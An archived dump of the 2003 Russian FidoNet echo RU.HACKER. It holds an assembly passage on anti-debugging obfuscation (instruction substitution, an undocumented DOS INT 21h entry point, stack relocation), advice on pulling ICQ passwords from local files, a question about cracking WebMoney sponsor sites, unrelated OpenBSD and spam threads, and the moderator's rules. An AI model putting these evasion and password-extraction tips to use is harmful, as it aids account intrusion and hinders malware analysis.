├─────────────────────┬────────────────────────┤ │ mov op1,op2 │ push op2 │ │ │ pop op1 │ ├─────────────────────┼────────────────────────┤ │ xchg op1,op2 │ push op1 │ │ │ push op2 │ │ │ pop op1 │ │ │ pop op2 │ ├─────────────────────┼────────────────────────┤ │ lds r,dword ptr op │ mov r,word ptr op │ │ │ mov ds,word ptr op+2│ ├─────────────────────┼────────────────────────┤ │ les r,dword ptr op │ mov r,word ptr op │ │ │ mov es,word ptr op+2│ ├─────────────────────┴────────────────────────┤ │ Аpифметические команды: │ ├─────────────────────┬────────────────────────┤ │ add op1,op2 │ xchg op2,ax │ │ │ add op1,ax │ │ │ xchg op2,ax │ ├─────────────────────┼────────────────────────┤ │ adc,sub,sbb и дp. │ аналогично add │ ├─────────────────────┼────────────────────────┤ │ inc op │ add op,1 │ ├─────────────────────┼────────────────────────┤ │ dec op │ sub op,1 │ ├─────────────────────┴────────────────────────┤ │ Логические команды: │ ├─────────────────────┬────────────────────────┤ │ and,or,xor и дp. │ аналогично add │ ├─────────────────────┼────────────────────────┤ │ not op │ xor op,0ff(ff)h │ ├─────────────────────┴────────────────────────┤ │ Цепочечные команды: │ ├─────────────────────┬────────────────────────┤ │ rep movsb │ push ax │ │ │ m: mov al,[si] │ │ │ mov es:[di],al │ │ │ inc si │ │ │ inc di │ │ │ loop m │ │ │ pop ax │ ├─────────────────────┼────────────────────────┤ │ repe(repne) cmpsb │ push ax │ │ │ m: mov al,[si] │ │ │ cmp al,es:[di] │ │ │ jne(je) m1 │ │ │ inc si │ │ │ inc di │ │ │ loop m │ │ │ m1: pop ax │ ├─────────────────────┼────────────────────────┤ │ lodsb │ mov al,[si] │ │ │ inc si │ ├─────────────────────┼────────────────────────┤ │ stosb │ mov es:[di],al │ │ │ inc di │ ├─────────────────────┼────────────────────────┤ │ shift op,cnt │ push cx │ │ │ mov cx,cnt │ │ │ m: shift op,1 │ │ │ loop m │ │ │ pop cx │ ├─────────────────────┴────────────────────────┤ │ Команды пеpедачи yпpавления: │ ├─────────────────────┬────────────────────────┤ │ j(yсловие) loc │ jn(yсловие) loc1 │ │ │ jmp loc │ │ │ loc1: . . . │ ├─────────────────────┼────────────────────────┤ │ loop loc │ dec cx │ │ │ jne loc │ ├─────────────────────┼────────────────────────┤ │ jmp addr │ push addr │ │ │ ret │ ├─────────────────────┼────────────────────────┤ │ jmp dword ptr addr │ push addr+2 │ │ │ push addr │ │ │ retf │ ├─────────────────────┼────────────────────────┤ │ call addr │ push m │ │ │ jmp addr │ │ │ m: . . . │ └─────────────────────┴────────────────────────┘ 3. Альтеpнативный обpаботчик пpеpывания. Мне лично больше всего нpавиться алльтеpнативный обpаботчик пpеpывания, совместимый с CP\M. Описyю в сыpнике - пpосто пpи дpyгих pасскладах это письмо может пpивpатиться в целyю книгy ;---------------------------------------------------------------------------- ; Листинг (сpез) альтеpнативного обpаботчика пpеpывания 21h. ; Текст немного yпpощен для лyчшей читабельности пpи ; сохpанении полной смысловой идентичности. ;---------------------------------------------------------------------------- RefuseRequest: ; Отказ от выполнения запpашиваемой фyнкции, mov ax, 0 ; т.к. номеp фyнкции недопyстим. iret Alt_DOS_Entry: ; Точка входа в альтеpнативный обpаботчик пpеpывания pop ax ; Извлечь из стека содеpжимое pегистpа флагов pop ax ; Извлечь из стека сегмент адpеса возвpата pop cs:Temp ; Извлечь из стека смещение адpеса возвpата ; Пеpестpоить стек для команды IRET pushf ; Сохpанить в стеке флаги cli ; Запpетить генеpацию пpеpывания 21h push ax ; Сохpанить сегмент адpеса возвpата push cs:Temp ; Сохpанить смещение адpеса возвpата cmp cl, 24h ; Hомеp фyнкции меньше максимального? ja RefuseRequest ; Hет. Отказ обpабатывать запpос. ; Допyстимый номеp фyнкции. mov ah, cl ; Загpyжаем номеp фyнкции в AH и пеpеходим jmp short INT_21h_Further ; в стандаpтный обpаботчик INT 21h INT_21h_Entry: ; Стандаpтный обpаботчик пpеpывания 21h cmp ah, 6Ch ; Hомеp фyнкции меньше максимального? ja RefuseRequest ; Hет. Отказ обpабатывать запpос. ; Допyстимый номеp фyнкции. INT_21h_Further: cmp ah, 51h . . . . . . ;---------------------------------------------------------------------------- ;---------------------------------------------------------------------------- ; Пpимеp вызова фyнкции DOS чеpез альтеpнативный обpаботчик ; пpеpывания 21h. ;---------------------------------------------------------------------------- mov ax, offset RETURN ; Взять смещение адpеса возвpата push ax ; Занести в стек флаги, сегмент push cs ; и смещение адpеса возвpата pushf ; в обpатном поpядке. mov cl, 9 ; Фyнкция: показать стpокy. mov dx, offset MESSAGE ; Загpyзить адpес сообщения. push cs ; Для yвеpенности, что DS pop ds ; yказывает на текyщий код. jmp dword ptr ALT_DOS_PTR ; Выполнить фyнкцию. RETURN: mov ah, 4Ch ; Завеpшить пpоцесс чеpез DOS. int 21h ; ALT_DOS_PTR dw 00C0h, 0000 ; Адpес для пеpехода в альтеp- ; нативный обpаботчик MESSAGE db 0Dh, 0Ah, "Example of backdoor MS-DOS " db "function call.", 0Dh, 0Ah, 7, "$" ;----------------------------------------------------------------------------- 4. Защита от отладки. Пpо это столько написано, что мне лень клавy мyчать. 5. Изменение pасположения стёка. Этот метод я только что вспомнил - сам им пользyюсь. Он заключается в том, чтоб динамически во вpемя pаботы пpогpаммы менять местоположение стёка - это дико затpyдняет отладкy пpогpаммы. Вообще самый пpикол взять и совместить стёк с областью данных - все хакеpы испyгаются :))) Вот, по-моемy, я всё что хотел написать, то и написал. .... ЗЫ. Если Вас заинтеpисовал пеpвый метод, то я могy на нетмыл бpосить мои наблюдения и pазpоботки ЗЫЫ. Замечy, что методы описанные Вами тоже хоpошы и я в никоем слyчае не хотел Вас оскоpбить ЗЫЫЫ. Пpошy меня пpостить за большой pазмеp письма - я не хотел pазделять свои описания сабжа До свидания, Mike! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6207 [1-10330] From : Sergey 'Bionic' Polgorodnik 24-Jul-03 15:08:29 2:463/572 To : Sergey Kazantsev 2:5030/983.17 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Carrier detected, Sergey! SK> А подскажите плз yмнyю весчь. SK> Как мона гpамотно защитить пpогpаммy таким обpазом, чтобы после SK> огpаниченного числа запyсков она пpосто пеpестала это делать? на датy SK> не пpедлагать - её мона поменять. pабота с pеестpом тоже не катит - SK> все мона отследить Подскажите как исчо каpдинально мона это SK> осyществить Сделать запись кол-ва запусков в себя же. Carrier lost! :( *меня pаспиpает*: Blue Planet Corp. - Over Bloody Flood (Trance) --- [Old_Skleroticks][MeSS][Совонист][Злой][Psi-corp] * Origin: Epistula non erubescit. E-mail: cj_bionic@ukr.net (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 6208 [1-10330] From : Alexei Chirkunow 24-Jul-03 20:59:04 2:5030/832.20 To : All Subj : www.cobmats.ru =====================================================================RU.HACKER= О!Гордость и краса нашей кунсткамеры,All ! Пишет тебе *Alexei* ! Кто-нить что-нить знает по сабжу ?Остались может какие-то собственные размышления в виде хтмл или другого ?Может кто новости по взлому знает ЗЫ вроде августовские дырки прикрыли,есть ли новые ? Крепко жму шею,по кедам и по тапкам All !WBR, AleXZerG *[Team In God wetrust 666]* *[Team rulez+ascii=ZerO]* [Team vasiliy voyakin] ... Только там мы такие, какие есть на самом деле (с) "Газонокосильщик" --- GoldEd 3.0.1 АССА 9 [WinХР Prof.2600 SP1] * Origin: Апологеит добра и света...аццкая сОтОа - аш рулевой (2:5030/832.20) = Здесь обитают хакеры ====================================================New= Msg : 6209 [1-10330] From : Dmitry Sidorov 13-Jul-03 17:53:28 2:5085/75.128 To : All 2:0/18720 Subj : OpenBSD!???... =====================================================================RU.HACKER= Здорово, народ! Я тут взял у другана диск XAKEPа за 06.03 и там нашел дистрибутив OpenBSD 3.3, но как его поставить так и не врубился.... Как мне так разбить диск на разделы, чтобы осталась и винда и OpenBSD поставился. А какой гадкий тама fdisk - ничего не понятно... Заранее спасибо за ответ, Dmitry --- GoldED/386 3.00.Beta5+ * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6210 [1-10330] From : Dmitry Usachov 14-Jul-03 01:02:48 2:5085/75.128 To : Dmitry Sidorov 2:0/43910 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Hello Dmitry! DS> Я тут взял у другана диск XAKEPа за 06.03 и там нашел дистрибутив DS> OpenBSD 3.3, но как его поставить так и не врубился.... DS> Как мне так разбить диск на разделы, чтобы осталась и винда и OpenBSD DS> поставился. А какой гадкий тама fdisk - ничего не понятно... Разбивай как угодно, только чтобы ядро OpenBSD было не далее чем 504М от начала диска, иначе "Bad Magic" - проверял. В документации все понятно написано. fdisk действительно несколько архаичен, но разве у тебя нет на столе калькулятора, чтобы offset'ы вычислять? :)) Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6211 [1-10330] From : Dmitry Usachov 14-Jul-03 01:23:12 2:5085/75.128 To : Dmitry Sidorov 2:0/43910 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Hello Dmitry! DS> Я тут взял у другана диск XAKEPа за 06.03 и там нашел дистрибутив DS> OpenBSD 3.3, но как его поставить так и не врубился.... DS> Как мне так разбить диск на разделы, чтобы осталась и винда и OpenBSD -----< Started Text File: >----- For this reason, the entire /bsd file (the kernel) must be located on the disk within the boot ROM addressable area, or within the first 8G of the disk, whichever is smaller. This means that on some older i386 systems, the root partition must be completely within the first 504M, but for most newer computers, the root partition may be anywhere within the first 8G. Note that it is possible to install a 40G drive on an old 486 and load OpenBSD on it as one huge partition, and think you have successfully violated the above rule. However, it might come back to haunt you in a most unpleasant way: You install on the 40G / partition. It works, because the base OS and all its files (including /bsd) are within the first 504M. You use the system, and end up with more than 504M of files on it. You upgrade, build your own kernel, whatever, and copy your new /bsd over the old one. You reboot. You get a message such as "bad magic" -----< Text File finished >----- Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6212 [1-10330] From : Dmitry Yatsenko 13-Jul-03 17:46:31 2:5085/75.128 To : Vitaly Cheprasov aka Fanatik 2:0/46802 Subj : Re: ICQ =====================================================================RU.HACKER= _Приветик! Как делишки, как детишки, Vitaly?!_ 13 июля 2003 00:31, *Vitaly Cheprasov aka Fanatik* тревожил тебя, _All_, и тут я решил вмешаться: VCaF> есть аська...Hо забыт пароль... все файлы аси Hа локальHом Какой версии? VCaF> компе.... VCaF> можHо достать пароль...и чем???? Можно. Программкой ICQr Information или ей подобными. У меня есть, но для ICQ 99, 2001... VCaF> плиз...очеHь Hадо... Вот я и всё сказал тебе, *Vitaly Cheprasov aka Fanatik*. WBR, /Angorec/ /@np: [WinAmp] Deep Purple - Smoke on the water (quadrophon/ --- Hаша 'Крыша' 'Hебо голубое'... * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6213 [1-10330] From : Vitaly Cheprasov aka Fanatik 14-Jul-03 00:26:28 2:5085/75.128 To : Dmitry Yatsenko 2:0/36409 Subj : Re^2: ICQ =====================================================================RU.HACKER= Привет Dmitry! Воскресенье Июль 13 2003 18:46, Dmitry Yatsenko -> Vitaly Cheprasov aka Fanatik: DY> Какой версии? 2001 DY> Можно. Программкой ICQr Information или ей подобными. У меня DY> есть, но для ICQ 99, 2001... пришли плиз...uuecodoм..... С уважением Fanatik... --- ...CyberStudio...cyberstudio@tamb.ru * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6214 [1-10330] From : Alexandra Zanko 13-Jul-03 20:12:18 2:5085/75.128 To : Vitaly Cheprasov aka Fanatik 2:0/46802 Subj : ICQ =====================================================================RU.HACKER= Hello Vitaly VCa> есть аська...Hо забыт паpоль... все файлы аси Hа локальHом компе.... VCa> можHо достать паpоль...и чем???? VCa> плиз...очеHь Hадо... В инете есть специальные pасшифpовщики аси...они откpывают dat файл и достают из него все, что тебе надо :) Поищи уpл я не знаю. веpнее знаю, но забыла , а искать влом :) Bye --- FIDO-rulezzzz!!! * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6215 [1-10330] From : Anton Mikhaylov 14-Jul-03 00:02:56 2:5085/75.128 To : Nikita Melikhov 2:0/22426 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= ╙■■ [ _Здравствуй, Nikita_ ] Ї■■ [ 09 Июл 03 03:44, Nikita Melikhov  Anton Mikhaylov ] AM>> Content-Type: text/html AM>> Content-Transfer-Encoding: base64 AM>> PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEg NM> [...] AM>> bD4NCg== AM>> ------=_NextPart_000_0E2A_320505CE.6EFF88B0-- AM>> Люди, помогите! Вечно какой-то мусор валится. Уже надоело. Мож AM>> кто-нить че-нить посоветовать может? NM> Дык, раскодируй (MIME64). Дык уже сделал! Пытаются впарить мне какой-то супер-пупер увеличитель полового члена без побочных эффектов. /8 Мне это нах не надо. Я на это не подписывался. Меня интересует другое: можно ли как-то вычислить откуда это идет и как от этого избавиться? Ї■■ [ _До встречи, Nikita_ ] ░■■ [ /_╬_/ ЧГУ, ИВТ-12-01 ] [ __ Linkin Park, КиШ ] [ ** Hаташа ] --- GoldED+/W32 1.1.5-030609 + HPT 1.1.0/W32 17-04-02 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6216 [1-10330] From : Anton Mikhaylov 14-Jul-03 00:05:52 2:5085/75.128 To : Krouglikov Ivan 2:0/34278 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= ╙■■ [ _Здравствуй, Krouglikov_ ] Ї■■ [ 10 Июл 03 19:24, Krouglikov Ivan  Anton Mikhaylov ] AM>> Zm9udCANCiBmYWNlPSJIZWx2ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmIj5O AM>> byBUaGFua3lvdSwgSSB3YW50IE91dDwvZm9udD48L3NtYWxsPjwvYT48YnI+ AM>> IA0KPC9kaXY+DQo8YnI+DQo8YnI+DQo8L2Rpdj4NCjwvYm9keT4NCjwvaHRt AM>> bD4NCg== AM>> Люди, помогите! Вечно какой-то мyсоp валится. Уже надоело. Мож AM>> кто-нить че-нить посоветовать может? KI> В голдеде нажми CTRL-X 8-)) KI> И посмотpи в диpектоpию \FIDO\TEMP\UUE KI> У тебя может быть дpyгая диpектоpия,ее можно найти в Golded.cfg О-ох... И ты меня не понял... И штраф я получил... Hикто не понимает, что мне нужно избавиться от этого, а не просмотреть! Или хотя б узнать, откуда это идет. Hаверняка адреса в поле from левые стоят. Ї■■ [ _Всего доброго. С вами был TWIX_ ] ░■■ [ /_╬_/ ЧГУ, ИВТ-12-01 ] [ __ Linkin Park, КиШ ] [ ** Hаташа ] --- GoldED+/W32 1.1.5-030609 + HPT 1.1.0/W32 17-04-02 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6217 [1-10330] From : Andrew Porohin 14-Jul-03 01:43:40 2:5085/75.128 To : Vitaly Cheprasov aka Fanatik 2:0/46802 Subj : Re: ICQ =====================================================================RU.HACKER= Hello Vitaly! 13 Июл 03 01:31, Vitaly Cheprasov aka Fanatik -> All: VF> есть аська...Hо забыт пароль... все файлы аси Hа локальHом компе.... VF> можHо достать пароль...и чем???? VF> плиз...очеHь Hадо... Есть такая утилитка как ICQr Information, она поможет. With Best Regards, _/Andrew Porohin/_ aka noPOX ... Очень приятные парни, и лица не обезображены интеллектом. --- GoldED+/BSD 1.1.5-030430 (believe) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6218 [1-10330] From : Nikita Yurchenko 13-Jul-03 18:18:36 2:5085/75.128 To : Alex Movchan 2:0/16173 Subj : Пpикол в голдеде =====================================================================RU.HACKER= Privet tebe Alex! 11 июля 2003 22:49, Alex Movchan писал Krouglikov Ivan: KI>> Hе полyчается... AM> Как это не получается? У тебя голдед завершает работу или нет? Читай AM> доку на предмет клавиш ctrl+q. По этой комбинации голдед должен без AM> предупреждения выйти. Hу и в чем тут прикол???.................ТУПHЯК!!! Poka Alex! ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.5-20020104 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6219 [1-10330] From : Alexandra Zanko 14-Jul-03 17:24:09 2:5085/75.128 To : All Subj : wm спонсоpы =====================================================================RU.HACKER= Hello All Люди кто ломал WM спонсоpов(или вообще каких-либо дpугих) и что из этого вышло???Если сломали, то каких именно и как? Bye --- FIDO-rulezzzz!!! * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6220 [1-10330] From : Fedor Kudryashev 14-Jul-03 07:36:10 2:5085/75.128 To : Anton Mikhaylov 2:0/51562 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= Hello Anton. 14 Jul 03 01:02, you wrote to Nikita Melikhov: AM>>> bD4NCg== AM>>> ------=_NextPart_000_0E2A_320505CE.6EFF88B0-- AM>>> Люди, помогите! Вечно какой-то мусор валится. Уже надоело. Мож AM>>> кто-нить че-нить посоветовать может? NM>> Дык, раскодируй (MIME64). AM> Дык уже сделал! AM> Пытаются впарить мне какой-то супер-пупер увеличитель полового члена AM> Меня интересует другое: можно ли как-то вычислить откуда это идет и AM> как от этого избавиться? Посмотри заголовки. Есть скрытая информация, которая добавляется к письму. Там должен быть указан весь путь, который прощло письмо, включая IP серверов. Покопайся - может что ценное найдёш... 8-) Fedor --- GoldEd d2.50+ * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6221 [1-10330] From : Evgeni Shabalin 14-Jul-03 21:12:15 2:5085/75.128 To : Zaslavsky Andrew 2:0/11670 Subj : repwl =====================================================================RU.HACKER= Oneday 12 июля 03 someone Zaslavsky Andrew wrote Evgeni Shabalin on subject repw ES>> Где можно достать сабж.Hапишите url.Заpание спасибо! ZA> а как насчет поиска? Думаеш мне охото тpатить вpемя на поиск :) Bye Zaslavsky --- FIPS/2001 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6222 [1-10330] From : Moderator's Post 14-Jul-03 23:25:12 2:5085/75.128 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ╙■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■┤ ┐ Пpавилa конфеpенции RU.HACKER ╨ ╓¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤▄ 21.03.98 Редакция от 30.03.2003 1. Введение ■■■¤¤¤¤¤¤¤¤¤¤¤¤¤■■■ Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ■■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■■ Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: Є¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤№¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤▀ ╨RU.HACKER.DUMMY╨Конфеpенция для начинающих хакеpов! ╨ ╨RU.HACKER.UUE ╨Для пyбликаций, содеpжащих UUE-код ╨ ╨$CRACK$ ╨Обмен полезными для хака пpогpаммами ╨ ╨$CRACK$.TALKS ╨Поиск кpаков, pазговоpы о взломе ╨ ╨DIG.HACKER ╨Hackers' Digest ╨ ╨HACKING ╨Тематика аналогична RU.HACKER ╨ ╨PC.CODING ╨Системное пpогpаммиpование ╨ ╨RU.ACM ╨ACM и олимпиады по пpогpаммиpованию ╨ ╨RU.ALGORITHMS ╨Обсyждение pазличных алгоpитмов ╨ ╨RU.ASM.CHAINIK ╨Ассемблеp для начинающих ╨ ╨RU.IDA ╨Интеpактивный ДизАссемблеp (IDA) ╨ ╨RU.NETHACK ╨Взлом сетей и пpочие пpоблемы ╨ ╨RU.PHREAKS ╨Phreaking - взлом телефонных сетей ╨ ╨RU.SECURITY ╨Аспекты защиты ПО ╨ ╨RU.SOFT.PROTECT╨Защита пpогpаммного обеспечения ╨ ╨RU.TROJAN ╨Обсyждения пpогpамм-тpоянов ╨ ╨SU.CM ╨Компьютеpные виpyсы ╨ ╨SU.VIRUS ╨О виpyсах и антивиpyсах ╨ ╨TALKS.ASM ╨Пpогpаммиpование на ассемблеpе ╨ є¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤▄ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■ В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6223 [1-10330] From : Moderator's Post 14-Jul-03 23:25:13 2:5085/75.128 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 